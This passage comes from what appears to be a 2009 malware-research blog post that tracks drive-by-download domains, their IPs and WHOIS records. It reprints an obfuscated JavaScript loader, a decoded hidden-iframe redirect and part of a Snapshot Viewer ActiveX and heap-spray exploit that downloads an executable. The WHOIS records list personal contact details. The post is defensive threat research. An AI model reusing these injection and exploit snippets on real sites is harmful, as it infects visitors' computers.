href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c" target="_blank">Anubis</a></td></tr><tr><td>hxxp://bizoplata.ru/ballast.html</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=19f8e2944f3848c2b9980020300952db&t=1240264005&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/courier.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=93cc42c58cbe763222e43fa8f6375023&t=1239920723&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/pay.html?</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=38182f76de5bcf5d090cdd9b36424d74&t=1240263970&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://bizoplata.ru/post.html</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&t=1239390474&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://dasretokfin.com/load.php</td><td><a href="http://jsunpack.jeek.org/dec/go?url=dasretokfin.com_load.php" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/thread.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=c6f531cec4db882e322b62f802e8c481&t=1240199423&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/golf.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=a89ecbd89cd1fd83341ebbfe467dca53&t=1240199761&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://mixbunch.cn/bowling.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=022e3c32f124fd0c0e50939b5399a6f8&t=1240250684&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://peskufex.cn/ss/in.cgi?2</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=64a744ae04d96b2b2dd8bd3d2d08dc22&t=1239390474&type=js" target="_blank">Source</a></td></tr><tr><td>hxxp://startdontstop.ru/bigmac.html</td><td><a href="http://wepawet.iseclab.org/view.php?hash=add37e12cc791e69d3e0670f58f39901&t=1239890697&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://sunmaiamibich.ru/pupu/in.php</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=cea26289df93bc2a5fd52c0d8767305a&t=1240188628" target="_blank">Analysis</a></td></tr><tr><td>hxxp://sunmaiamibich.ru/pupu/load.php</td><td><a href="http://www.virustotal.com/analisis/2bab5a949c6e83dba25eb4bda2b90493" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19f86524a316a29d4e9dfd0d992132ee9" target="_blank">Anubis</a></td></tr><tr><td>hxxp://tixwagoq.cn/in.cgi?4</td><td><a href="http://wepawet.cs.ucsb.edu/view.php?hash=8717fc57e750e4948877ea1496eeebe0&t=1240264417&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/index.php </td><td><a href="http://wepawet.iseclab.org/view.php?hash=bc2e9aa85b7f80634e5b7e5df0e76324&t=1238341867&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/load.php</td><td><a href="http://anubis.iseclab.org/?action=result&task_id=19f0382ef717247d4913db3864368582c&format=html" target="_blank">Anubis</a></td></tr><tr><td>hxxp://tochtonenado.com/yes/include/spl.php</td><td><a href="http://wepawet.iseclab.org/view.php?hash=256e6b1f2bb2984111f9a742fc768806&t=1240264874&type=js" target="_blank">Analysis</a></td></tr><tr><td>hxxp://utevox.site90.com/f/index.php</td><td><a href="http://jsunpack.jeek.org/dec/go?url=utevox.site90.com_f_index.php" target="_blank">Analysis</a></td></tr><tr><td>hxxp://utevox.site90.com/f/load.php</td><td>dead</td></tr></table><p><br /> 91.212.41.91<br /></p><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="28">hxxp://<span class="scam_website">mixbunch.cn</span><br /> hxxp://<span class="scam_website">sunmaiamibich.ru</span></td></tr></table><br />91.212.65.7<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="14">hxxp://<span class="scam_website">peskufex.cn</span></td></tr></table><br />95.129.144.228<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="42">hxxp://<span class="scam_website">5rublei.com</span><br /> hxxp://<span class="scam_website">dasretokfin.com</span><br /> hxxp://<span class="scam_website">tochtonenado.com</span></td></tr></table><br />95.129.144.13<br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">bizoplata.ru</span><br /> hxxp://<span class="scam_website">startdontstop.ru</span><br /></td></tr></table><p>64.235.52.170<br /></p><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">utevox.site90.com</span><br /></td></tr></table><br />************************<br /><br />Domain Name: <span class="scam_website">mixbunch.cn</span><br />ROID: 20081108s10001s82359461-cn<br />Domain Status: clientTransferProhibited<br />Registrant Organization: Raymond Keaton <br />Registrant Name: Raymond Keaton<br />Administrative Email: Keaton@cybernauttech.com<br />Sponsoring Registrar: 广东时代互联科技有限公司<br />Name Server:ns1.softwaresupport-group.com<br />Name Server:ns2.softwaresupport-group.com<br />Registration Date: 2008-11-08 16:06<br />Expiration Date: 2009-11-08 16:06<br /><br />domain: <span class="scam_website">sunmaiamibich.ru</span><br />type: CORPORATE<br />nserver: ns1.softwaresupport-group.com.<br />nserver: ns2.softwaresupport-group.com.<br />state: REGISTERED, DELEGATED<br />person: Private person<br />phone: +7 910 3478712<br />e-mail: dmitrijstanislavskij@yandex.ru<br />registrar: REGRU-REG-RIPN<br />created: 2009.04.16<br />paid-till: 2010.04.16<br />source: TC-RIPN<br /><br />Domain Name: <span class="scam_website">peskufex.cn</span><br />ROID: 20090315s10001s50367993-cn<br />Domain Status: clientDeleteProhibited<br />Domain Status: clientTransferProhibited<br />Registrant Organization: 永也进出口公司<br />Registrant Name: 张龙<br />Administrative Email: alvin_555@yeah.net<br />Sponsoring Registrar: 易名中国<br />Name Server:ns2.dnsmytruedns.com<br />Name Server:ns1.dnsmytruedns.com<br />Registration Date: 2009-03-15 15:37<br />Expiration Date: 2010-03-15 15:37<p>Domain Name: <span class="scam_website">5rublei.com</span><br />Registrar: BIZCN.COM, INC.<br />Whois Server: whois.bizcn.com<br />Referral URL: http://www.bizcn.com<br />Name Server: NS1.EVERYDNS.NET<br />Name Server: NS2.EVERYDNS.NET<br />Name Server: NS3.EVERYDNS.NET<br />Name Server: NS4.EVERYDNS.NET<br />Status: clientDeleteProhibited<br />Status: clientTransferProhibited<br />Updated Date: 31-mar-2009<br />Creation Date: 30-jun-2008<br />Expiration Date: 30-jun-2010<br /><br />Domain Name: <span class="scam_website">dasretokfin.com</span><br />Registrar: REGTIME LTD.<br />Whois Server: whois.regtime.net<br />Referral URL: http://www.webnames.ru<br />Name Server: NS1.AFRAID.ORG<br />Name Server: NS2.AFRAID.ORG<br />Name Server: NS3.AFRAID.ORG<br />Name Server: NS4.AFRAID.ORG<br />Status: ok<br />Updated Date: 24-mar-2009<br />Creation Date: 18-feb-2009<br />Expiration Date: 18-feb-2010<br /><br />Domain Name: <span class="scam_website">tochtonenado.com</span><br />Registrar: UK2 GROUP LTD.<br />Whois Server: whois.hostingservicesinc.net<br />Referral URL: http://www.uk2group.com/<br />Name Server: NS1.EVERYDNS.NET<br />Name Server: NS2.EVERYDNS.NET<br />Name Server: NS3.EVERYDNS.NET<br />Name Server: NS4.EVERYDNS.NET<br />Status: clientTransferProhibited<br />Updated Date: 25-mar-2009<br />Creation Date: 25-mar-2009<br />Expiration Date: 25-mar-2010<br /><br />domain: <span class="scam_website">bizoplata.ru</span><br />type: CORPORATE<br />nserver: ns1.sevensearchon.ru<br />nserver: ns2.sevensearchon.ru<br />state: REGISTERED, DELEGATED<br />person: Private Person<br />phone: +7 495 0000000<br />e-mail: tuhov83@mail.ru<br />registrar: CT-REG-RIPN<br />created: 2009.01.23<br />paid-till: 2010.01.23<br />source: TC-RIPN<br /><br />domain: <span class="scam_website">startdontstop.ru</span><br />type: CORPORATE<br />nserver: ns1.sevensearchon.ru.<br />nserver: ns2.sevensearchon.ru.<br />state: REGISTERED, DELEGATED<br />person: Private Person<br />phone: +7 916 7843219<br />e-mail: ale32888049@yandex.ru<br />registrar: NAUNET-REG-RIPN<br />created: 2009.04.14<br />paid-till: 2010.04.14<br />source: TC-RIPN<br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-3244632093602359334?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-41824749533840587652009-04-17T10:15:00.000-07:002009-04-19T14:14:40.949-07:00Black Hat SEO - RBN Hacks, p.3<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="502" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br /> Triple threats<br /></p><table width="488" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="488"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URL with exploits) <br /> which lead to trojans beeing automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only links are safe)<br /><p>The story about <i>"Hosted JavaScript leading to .cn PDF Malware"</i> which has implicated <span class="scam_website">clarafin[.]info</span>, <span class="scam_website">fabiomotor[.]cn</span> and <span class="scam_website">letomerin[.]cn</span> continue!<br /> <br />New sites appear as intermediaries for distributing malware.<br /><hr />About <span class="scam_website">beebest[.]cn</span> I will take this domain for example "cmizziconstruction.com"<br /><br /><a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=cmizziconstruction.com" target="_blank">The Diagnostic page for cmizziconstruction.com</a>. (Provided by Google Safe Browsing)<br /><br /> In the source code we can see:<br /><br /><table width="206" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="10544" height="404" style="padding:10px"><script>function c274acb4b1h49d2e3646f592(h49d2e3646fd61){ function h49d<br />2e36470534(){return 16;} return (parseInt(h49d2e3646fd61,h49d2e36470534()<br />));}function h49d2e364714d7(h49d2e36471ca8){ function h49d2e36473415(){<br />var h49d2e36473be3=2;return h49d2e36473be3;} var h49d2e364724a8='';h49<br />d2e36474427=String.fromCharCode;for(h49d2e36472c43=0;h49d2e36472c43<<br />h49d2e36471ca8.length;h49d2e36472c43+=h49d2e36473415()){ h49d2e3647<br />24a8+=(h49d2e36474427(c274acb4b1h49d2e3646f592(h49d2e36471ca8.subst<br />r(h49d2e36472c43,h49d2e36473415()))));}return h49d2e364724a8;} var r36=''<br />;var h49d2e36474be1='3C7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E696628<br />216D7'+r36+'96961297'+r36+'B646F637'+r36+'56D656E7'+r36+'42E7'+r36+'7'+<br />r36+'7'+r36+'2697'+r36+'465287'+r36+'56E657'+r36+'363617'+r36+'065282027<br />'+r36+'2533632536392536362537'+r36+'3225363125366425363525323025366<br />5253631253664253635253364253633253332253337'+r36+'2532302537'+r36+'<br />332537'+r36+'32253633253364253237'+r36+'2536382537'+r36+'342537'+r36+<br />'342537'+r36+'302533612532662532662536352537'+r36+'382537'+r36+'34253<br />7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36<br />+'392532652536332536662536642532662536392536652532652537'+r36+'302<br />536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34<br />2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346<br />42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536<br />6625366425323825323925326125333425333125333125333325333825323925<br />3262253237'+r36+'253334253338253336253338253636253336253336253237'<br />+r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364<br />253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363<br />82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+'<br />342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253<br />7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925<br />3361253638253639253634253634253635253665253237'+r36+'253365253363<br />2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29<br />293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27<br />'+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3<br />64714d7(h49d2e36474be1));</script></td></tr></table><p>The deobfuscated code is<br /><br /><table width="477" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="475" height="174" style="padding:10px"><script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%<br />20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%7<br />4%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f%<br />6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f<br />%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%<br />2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%2<br />0%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d<br />%31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%<br />6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72<br />%61%6d%65%3e'));}var myia=true;</script><br /></td></tr></table><p>which is an IFRAME</p><table width="200" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="459" height="65" style="padding:10px"><iframe name=c27 src='hxxp://<span class="scam_website">extraspray.com</span>/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe></td></tr></table><p><u>Analysis on March 25</u> <br /></p><table width="487" border="0" cellspacing="0" cellpadding="0"><tr><td width="281" height="28">hxxp://<span class="scam_website">extraspray.com</span>/in.php?<br /></td><td width="206"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&t=1238026597&type=js" target="_blank">URL Analysis</a></td></tr><tr><td height="40" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/getexe.exe<br />?o=7&t=1238025784&i=2154770527&e=<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="36" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x19.php<br />?o=7&t=1238025784&i =2154770527<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="35" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x18.php<br />?o=7&t=1238025784&i=2154770527<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="31" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/exploits/x21x1.php<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="35" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span>/evo/getexe.exe<br />?o=4&t=1238025787&i=2154770527&e=</td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="31" style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC">hxxp://<span class="scam_website">rifnasax.cn</span>/nuc/exe.php</td><td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=d52f9efb85ed74924aad6cd64720d575&t=1237274961" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/82335932d790a3f0073266d648527e75" target="_blank">VirusTotal</a> (Kryptik)</td></tr></table><p><u>Analysis on April 17 </u></p><table width="487" border="0" cellspacing="0" cellpadding="0"><tr><td width="282" height="24">hxxp://<span class="scam_website">extraspray.com</span>/in.php?<br /></td><td width="205"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=687425d9d39cd838a9fcf5f05f37da8f&t=1239979475&type=js" target="_blank">URL Analysis</a></td></tr><tr><td height="47" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/getexe.exe<br />?o=7&t=1239978315&i=2154770527&e=<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="39" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/exploits/x19.php<br />?o=7&t=1239978315&i=2154770<br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="38" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/exploits/x18.php<br />?o=7&t=1239978315&i=2154770527<br /></td><td style="border-top:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&t=1239979751&type=js" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank">Anubis</a></td></tr><tr><td height="37" style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span>/evo/getexe.exe<br />?o=7&t=1239978315&i=2154770527&e=18<br /></td><td style="border-top:solid 1px #CCC; border-bottom:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=65deff066bed6693c366783d403025e6&t=1239979751&type=js" target="_blank">URL Analysis</a> - <a href="http://www.virustotal.com/analisis/b7cda5ae024b4e54fa1b866a6402d996" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=13c1fb5e0034748c45df92abe9491e274" target="_blank">Anubis</a></td></tr></table><br /><p><br />Now with <span class="scam_website">clarafin[.]info</span><br /><br /><a href="http://wepawet.cs.ucsb.edu/view.php?hash=3ec2e92d7f43a9af31325c7609a5d43c&t=1239978396&type=js" target="_blank">Analysis on April 17 (07:26) </a><br /><br /> The source code show:<br /></p><table width="462" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="460" height="174" style="padding:10px"><script>if (!myia){<br />document.write(unescape('<br />%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33%<br />32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c<br />%61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61%<br />66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d<br />%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%<br />72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29<br />%2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20%<br />77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%7<br />4%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73<br />%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%<br />3e%3c%2f%69%66%72%61%6d%65%3e'));<br />}<br />var myia = true;<br /></script><br /></td></tr></table><p> which is the IFRAME for <span class="scam_website">clarafin[.]info</span><br /></p><table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="448" height="90" style="padding:10px"><iframe name=c32 src='hxxp://<span class="scam_website">clarafin.info</span>/traff/index.php?'+Math.round(Math.random()<br />*253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'><br /> </iframe><br /></td></tr></table><br />You can follow the result for "<span class="scam_website">clarafin.info</span>" on this page: <br /><a href="http://isc.sans.org/diary.html?storyid=6178" target="_blank" style=" color:#000">Internet Storm Center: Hosted javascript leading to .cn PDF malware</a> <br /><br />-------------<br /><br /><p> And now the new one who just appear on the same page: beebest[.]cn<br /><br /><a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=beebest.cn" target="_blank" style="color:#000">Google Diagnosting for beebest.cn</a> AS41665 (HOSTING)<br /><br />This is just a part of the code:<br /></p><table width="450" border="0" cellspacing="0" cellpadding="0" style="border: solid 1px #D6D6D6"><tr><td width="448" height="450" style="padding:10px"><p> function ss()<br />{<br />try{<br />ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");<br />var arbitrary<br />_file = "<b>hxxp://beebest.cn/dlutrl23dnwfas/exe.php</b>";<br />var dest = 'C:/Program Files/Outlook Express/wab<br />.exe';<br />document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'><br /></object><br />");<br />attack.SnapshotPath = arbitrary_file;<br />setTimeout('window.location = "ldap://127.0.0.1"',3000);<br />a<br />ttack.CompressedPath = dest;<br />attack.PrintSnapshot(arbitrary_file,dest);<br />}catch(e){}<br />}<br />function xml()<br />{<br />var spray = unescape("%u0a0a%u0a0a");<br />do { spray += spray; } while(spray.length < 0xd0000);</p><p>memory = new Array();<br />for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }<br />document.<br />getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><!<br /></p></td></tr></table><br /><table width="437" border="0" cellspacing="0" cellpadding="0"><tr><td width="282" height="31">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/index.php<br /></td><td width="155"><a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=8c979b2883f0cf92419a4b342fff4545&t=1239946824" target="_blank">URL Analysis</a></td></tr><tr><td height="32" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/spl/pdf.pdf<br /></td><td style="border-top:solid 1px #CCC"><a href="http://wepawet.cs.ucsb.edu/view.php?hash=07dba62f6c9ddb0e4382026de7b1df26&t=1239981396&type=js">URL Analysis</a></td></tr><tr><td height="39" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">beebest.cn</span>/dlutrl23dnwfas/exe.php<br /></td><td style="border-top:solid 1px #CCC"><a href="http://www.virustotal.com/analisis/e503d8229f7e75c16e93fb24ea0158a9" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1417b1756c1d1e6641d2d1aa0a04cc219&call=first" target="_blank">Anubis</a></td></tr></table><br /><br />A ThreatExpertresult show the connection with stopgam.cn and <br />stopgam2.cn after infection<br /><br /><a href="http://www.threatexpert.com/report.aspx?md5=8f82a4d3271465a32ec888839bdcede0" target="_blank">ThreatExpert Result</a><br /><br /><hr /><br /><br />It's recommended that you block these IPs using your hosts file or your firewall.<br /> <br />These domain are also cited on Malware Domain List: <a href="http://www.malwaredomainlist.com/mdl.php?search=91.212.65.7&colsearch=All&quantity=50" target="_blank">91.212.65.7</a> <br />and all are still active.<br /><br /><table width="294" border="0" cellspacing="0" cellpadding="0"><tr><td height="20">hxxp://<span class="scam_website">beebest.cn</span></td><td>78.109.25.215</td></tr><tr><td height="20" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">clarafin.info</span></td><td style="border-top:solid 1px #CCC">212.5.74.37</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">corpamata.cn</span><br /></td><td style="border-top:solid 1px #CCC">78.109.25.215</td></tr><tr><td width="164" height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">extraspray.com</span><br /></td><td width="130" style="border-top:solid 1px #CCC">72.232.116.51</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">agkt.info</span><br /></td><td style="border-top:solid 1px #CCC"> </td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">rifnasax.cn</span></td><td style="border-top:solid 1px #CCC">91.212.65.7</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">sgqw.info</span></td><td style="border-top:solid 1px #CCC">85.17.136.137</td></tr><tr><td height="18" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">stopgam.cn</span></td><td style="border-top:solid 1px #CCC">85.17.136.137</td></tr><tr><td height="22" style="border-top:solid 1px #CCC">hxxp://<span class="scam_website">stopgam2.cn</span></td><td style="border-top:solid 1px #CCC">174.129.244.106<br />174.129.241.185</td></tr></table><br /><br />78.109.25.217<br /><br />IP Location - Namibia - Plathost2 - Ivan Kirst<br /><br />Domain Name: <span class="scam_website">beebest.cn - stopgam.cn - corpamata.cn</span><br />Domain Status: ok<br />Registrant Organization: DomainsC<br />Registrant Name: MichellGregory<br />Administrative Email: abuse@domainsreg.cn<br />Sponsoring Registrar: 厦门华融盛世网络有限公司 - <br />Xiamen Huarong Spirit Network Limited<br />Name Server: ns1.us.editdns.net<br />Name Server: ns2.us.editdns.net<br />Name Server: ns3.us.editdns.net<br />Registration Date: 2009-02-11<br />Expiration Date: 2010-02-11<br /><br />212.5.74.37<br /><br />IP Location - Russia<br /><br />Domain Name: <span class="scam_website">clarafin.info</span><br />Domain Status: ok<br />Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd<br />Name Server: ns1.us.editdns.net<br />Name Server: ns2.us.editdns.net<br />Name Server: ns3.us.editdns.net<br />Registration Date: 2009-03-18<br />Expiration Date: 2010-03-18<br /><br />85.17.136.137<br /><br />IP Location - Netherlands - LeaseWeb<br /><br />omain Name: <span class="scam_website">sgqw.info</span> <br />Domain Status: ok<br />Registrant Organization: Private person <br />Registrant Name: Sumir Mahadjan <br />Administrative Email: mahadjans9@gmail.com <br />Sponsoring Registrar: Regtime Ltd. (R455-LRMS)<br />Name Server: ns1.mtpv.info<br />Name Server: ns2.mtpv.info<br />Name Server:ns3.us.editdns.net<br />Registration Date: 2009-04-01<br />Expiration Date: 2010-01-01<br /><br />72.232.116.51 <br /><br />IP Location - US - Layered Technologies, Inc.<br /><br />omain Name: <span class="scam_website">extraspray.com</span><br />Domain Status: ok<br />Registrant Organization: Private person <br />Registrant Name: Sumir Mahadjan<br />Administrative Email: mahadjans9@gmail.com <br />Sponsoring Registrar: Regtime Ltd.<br />Name Server: vc11.amhost.net<br />Name Server: vc12.amhost.net<br />Registration Date: 2009-03-09<br />Expiration Date: 2010-03-09 <br /><br />174.129.244.106<br />174.129.241.185 <br /><br />IP Location - US - Amazon.com, Inc. <br /><br />Domain Name: <span class="scam_website">stopgam2.cn</span><br />ROID: 20090417s10001s12986159-cn <br />Domain Status: clientTransferProhibited <br />Registrant Name: Zitoclick <br />Administrative Email: support@zitoclick.com <br />Sponsoring Registrar: InamePro dba Dynadot <br />Name Server: ns1.dsredirection.com <br />Name Server: ns2.dsredirection.com <br />Registration Date: 2009-04-17 05:23 <br />Expiration Date: 2010-04-17 05:23 <br /><br />91.212.41.119 <br /><br />Domain Name: <span class="scam_website">tixwagoq.cn</span><br />Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. Hangzhou<br />Registrant Name: 周明 - Zhou<br />Administrative Email: suhalbuia@163.com <br />Sponsoring Registrar: 易名中国 - Easy Chinese<br />Name Server: ns1.runsdns.cn <br />Name Server: ns2.runsdns.cn <br />Registration Date: 2009-03-18 22:16 <br />Expiration Date: 2010-03-18 22:16 <br /><br />inetnum: 91.212.41.0 - 91.212.41.255<br />netname: gaztranzitstroyinfo-net<br />descr: LLC "Gaztransitstroyinfo"<br />country: Russia<br /> ------------<br /><br />91.212.65.7<br /><br />IP Location - Ukraine - Eurohost LLC <br /><br />Domain Name: <span class="scam_website">rifnasax.cn</span><br />Registrant Organization: Yong also Import and Export Corporation<br />Registrant Name: 张龙 - Long<br />Administrative Email: alvin_555@yeah.net <br />Sponsoring Registrar: 易名中国 - Easy Chinese<br />Name Server: ns2.dnsmytruedns.com <br />Name Server: ns1.dnsmytruedns.com <br />Registration Date: 2009-02-13 19:29 <br />Expiration Date: 2010-02-13 19:29 <br /><br />This IP appear to host several websites with live exploits.<br /><br />91.212.65.7 <br /><br /><table width="231" border="0" cellspacing="0" cellpadding="0"><tr><td width="231" height="20">hxxp://<span class="scam_website">dnsmytruedns.com</span><br /> hxxp://<span class="scam_website">hayboxiw.cn </span>(<a href="http://wepawet.cs.ucsb.edu/view.php?hash=d3305cce9ac1c0b1ccfdea16bbebc49a&t=1239984709&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">paksusic.cn</span><br />hxxp://<span class="scam_website">paylayos.cn</span><br />hxxp://<span class="scam_website">peskufex.cn</span><br />hxxp://<span class="scam_website">porgacig.cn</span><br />hxxp://<span class="scam_website">qicdator.cn </span>(<a href="http://wepawet.cs.ucsb.edu/view.php?hash=baca7b81a5ad8bcc70b210847db959c1&t=1238631850&type=js" target="_blank">Analysis</a>)<br />hxxp://<span class="scam_website">ralcofic.cn</span><br />hxxp://<span class="scam_website">rifnasax.cn</span> (<a href="http://wepawet.cs.ucsb.edu/view.php?hash=d52f9efb85ed74924aad6cd64720d575&t=1237274961&type=js" target="_blank">Analysis</a>)<br />hxxp://<span 